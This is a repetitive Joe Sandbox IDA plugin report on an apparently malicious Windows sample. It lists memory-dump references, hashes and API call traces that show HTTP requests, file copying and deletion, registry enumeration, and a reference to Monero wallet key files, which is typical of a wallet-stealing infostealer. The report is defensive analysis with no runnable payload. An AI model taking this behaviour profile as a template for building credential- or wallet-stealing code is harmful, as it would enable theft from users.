Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$de-DE
API String ID: 1224485577-26119564
Opcode ID: b00c5b87e5c8a98520fe74f69a712bdfbe0dfde9b74051f9d52703fe5d1916c1
Instruction ID: 45dda7176880f8b6b2209351756032d93b4fde54efd49fbeaa1dce2a0302ad38
Opcode Fuzzy Hash: b00c5b87e5c8a98520fe74f69a712bdfbe0dfde9b74051f9d52703fe5d1916c1
Instruction Fuzzy Hash: 2C329573920618ABDB16EBA0ED91FEEB378BF14700F40415AF50666192EF702B49DF52

Function 003C5960 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003C59F8
StrCmpCA.SHLWAPI(?,00E6F518), ref: 003C5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C5B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E6F638,00000000,?,00E6B848,00000000,?,003E1A1C), ref: 003C5E71
lstrlen.KERNEL32(00000000), ref: 003C5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 003C5E93
RtlAllocateHeap.NTDLL(00000000), ref: 003C5E9A
lstrlen.KERNEL32(00000000), ref: 003C5EAF
lstrlen.KERNEL32(00000000), ref: 003C5ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003C5EF1
lstrlen.KERNEL32(00000000,?,?), ref: 003C5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003C5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003C5F4C
InternetCloseHandle.WININET(00000000), ref: 003C5FB0
InternetCloseHandle.WININET(00000000), ref: 003C5FBD
HttpOpenRequestA.WININET(00000000,00E6F488,?,00E6F000,00000000,00000000,00400100,00000000), ref: 003C5BF8

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

InternetCloseHandle.WININET(00000000), ref: 003C5FC7

Strings

", xrefs: 003C5E16
------, xrefs: 003C5D4C
", xrefs: 003C5CD5
de-DE, xrefs: 003C5BC8
------, xrefs: 003C5C0B
------, xrefs: 003C5A96

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$de-DE
API String ID: 874700897-1932956479
Opcode ID: 5fcb8164704b804f7b795509c6182d71ae4069d5e005dfc8356b373b4438849d
Instruction ID: 0d4da266e23fa3fd46cbe23d5344180acb3da451cae2d856a2b79e483947a7fa
Opcode Fuzzy Hash: 5fcb8164704b804f7b795509c6182d71ae4069d5e005dfc8356b373b4438849d
Instruction Fuzzy Hash: 14125272820628ABCB16EBA0ED95FEEB378BF14700F40419AF50666191EF702F49DF55

Function 003CA790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DAA70: StrCmpCA.SHLWAPI(00E6A0C8,003CA7A7,?,003CA7A7,00E6A0C8), ref: 003DAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003CAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 003CAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 003CABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CA8B0

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

lstrcat.KERNEL32(?,00000000), ref: 003CACEB
lstrcat.KERNEL32(?,003E1320), ref: 003CACFA
lstrcat.KERNEL32(?,00000000), ref: 003CAD0D
lstrcat.KERNEL32(?,003E1324), ref: 003CAD1C
lstrcat.KERNEL32(?,00000000), ref: 003CAD2F
lstrcat.KERNEL32(?,003E1328), ref: 003CAD3E
lstrcat.KERNEL32(?,00000000), ref: 003CAD51
lstrcat.KERNEL32(?,003E132C), ref: 003CAD60
lstrcat.KERNEL32(?,00000000), ref: 003CAD73
lstrcat.KERNEL32(?,003E1330), ref: 003CAD82
lstrcat.KERNEL32(?,00000000), ref: 003CAD95
lstrcat.KERNEL32(?,003E1334), ref: 003CADA4
lstrcat.KERNEL32(?,00000000), ref: 003CADB7
lstrlen.KERNEL32(?), ref: 003CAE0D
lstrlen.KERNEL32(?), ref: 003CAE1C

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

DeleteFileA.KERNEL32(00000000), ref: 003CAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 003CABD4

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: f2c1860d280b0593bf6d76015010ec545c98dd650c427eef4d1b3028f4ac983b
Instruction ID: 7d603431db09f8d67aa6312a8e18eaafb416901b43e399dcbe0e7cb85dbd621f
Opcode Fuzzy Hash: f2c1860d280b0593bf6d76015010ec545c98dd650c427eef4d1b3028f4ac983b
Instruction Fuzzy Hash: E41287729106189BCB06FBE0EE96EEE7779BF14300F404119F507AA191EF31AE05DB62

Function 003CCEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00E6B6C8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003CCF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003CD0C7
RtlAllocateHeap.NTDLL(00000000), ref: 003CD0CE
lstrcat.KERNEL32(?,00000000), ref: 003CD208
lstrcat.KERNEL32(?,003E1478), ref: 003CD217
lstrcat.KERNEL32(?,00000000), ref: 003CD22A
lstrcat.KERNEL32(?,003E147C), ref: 003CD239
lstrcat.KERNEL32(?,00000000), ref: 003CD24C
lstrcat.KERNEL32(?,003E1480), ref: 003CD25B
lstrcat.KERNEL32(?,00000000), ref: 003CD26E
lstrcat.KERNEL32(?,003E1484), ref: 003CD27D
lstrcat.KERNEL32(?,00000000), ref: 003CD290
lstrcat.KERNEL32(?,003E1488), ref: 003CD29F
lstrcat.KERNEL32(?,00000000), ref: 003CD2B2
lstrcat.KERNEL32(?,003E148C), ref: 003CD2C1
lstrcat.KERNEL32(?,00000000), ref: 003CD2D4
lstrcat.KERNEL32(?,003E1490), ref: 003CD2E3

Part of subcall function 003DA820: lstrlen.KERNEL32(003C4F05,?,?,003C4F05,003E0DDE), ref: 003DA82B
Part of subcall function 003DA820: lstrcpy.KERNEL32(003E0DDE,00000000), ref: 003DA885

lstrlen.KERNEL32(?), ref: 003CD32A
lstrlen.KERNEL32(?), ref: 003CD339

Part of subcall function 003DAA70: StrCmpCA.SHLWAPI(00E6A0C8,003CA7A7,?,003CA7A7,00E6A0C8), ref: 003DAA8F

DeleteFileA.KERNEL32(00000000), ref: 003CD3B4

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: c87184e45820535deb87b4feea21a5e3ec80c8a9df0efd79b4c34fc00c0b0d84
Instruction ID: 39247a33e457e6113e6b1e5be351f2ed6fab8b3f7881692b4a038d68a2b6bc83
Opcode Fuzzy Hash: c87184e45820535deb87b4feea21a5e3ec80c8a9df0efd79b4c34fc00c0b0d84
Instruction Fuzzy Hash: 2AE174729502189BCB06EBE0EE96EEE7779BF14300F004159F507AB291DF35AE05DB62

Function 003C4880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003C4915
StrCmpCA.SHLWAPI(?,00E6F518), ref: 003C493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C4ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003E0DDB,00000000,?,?,00000000,?,",00000000,?,00E6F448), ref: 003C4DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003C4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003C4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003C4E49
InternetCloseHandle.WININET(00000000), ref: 003C4EAD
InternetCloseHandle.WININET(00000000), ref: 003C4EC5
HttpOpenRequestA.WININET(00000000,00E6F488,?,00E6F000,00000000,00000000,00400100,00000000), ref: 003C4B15

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

InternetCloseHandle.WININET(00000000), ref: 003C4ECF

Strings

", xrefs: 003C4D33
------, xrefs: 003C4C69
------, xrefs: 003C49BD
", xrefs: 003C4BF2
------, xrefs: 003C4B28
de-DE, xrefs: 003C4AE5

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$de-DE
API String ID: 460715078-1932956479
Opcode ID: 55407c281d5e26975ea6754c7f5ccf86abf34b1da75b30226c626ac2a853234b
Instruction ID: 3a2f43ce425692cb8b2eb5891ce14c1d5f799064d4f521dec3c66e1b39e7ec5c
Opcode Fuzzy Hash: 55407c281d5e26975ea6754c7f5ccf86abf34b1da75b30226c626ac2a853234b
Instruction Fuzzy Hash: 9B1281729106189ACB16EB90EDA2FEEB738BF14300F50419AF40676191EF702F49DF62

Function 003D8320 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

RegOpenKeyExA.KERNEL32(00000000,00E6C480,00000000,00020019,00000000,003E05B6), ref: 003D83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003D8426
wsprintfA.USER32 ref: 003D8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003D847B
RegCloseKey.ADVAPI32(00000000), ref: 003D848C
RegCloseKey.ADVAPI32(00000000), ref: 003D8499

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Strings

%s\%s, xrefs: 003D844D
- , xrefs: 003D85A3
8, xrefs: 003D858C
, xrefs: 003D84DF
?, xrefs: 003D837A

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
